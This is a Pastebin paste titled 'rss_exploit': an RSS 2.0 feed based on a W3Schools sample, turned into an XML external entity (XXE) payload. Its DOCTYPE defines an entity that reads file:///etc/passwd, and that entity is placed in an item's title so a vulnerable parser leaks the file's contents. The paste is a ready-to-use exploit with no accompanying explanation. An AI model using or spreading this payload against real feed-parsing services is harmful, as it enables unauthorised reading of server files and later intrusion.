nissim_abehcera

rss_exploit

Jan 27th, 2020
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE foo [ <!ELEMENT foo ANY >
  3. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
  4. <rss version="2.0">
  5.  
  6. <channel>
  7. <title>W3Schools Home Page</title>
  8. <link>https://www.w3schools.com</link>
  9. <description>Free web building tutorials</description>
  10. <item>
  11. <title>RSS Tutorial</title>
  12. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  13. <description>New RSS tutorial on W3Schools</description>
  14. </item>
  15. <item>
  16. <title>&xxe;</title><!--<title>test</title>-->
  17. <link>https://www.w3schools.com/xml</link>
  18. <description>mypass</description>
  19. </item>
  20. </channel>
  21. </rss>
Add Comment
Please, Sign In to add comment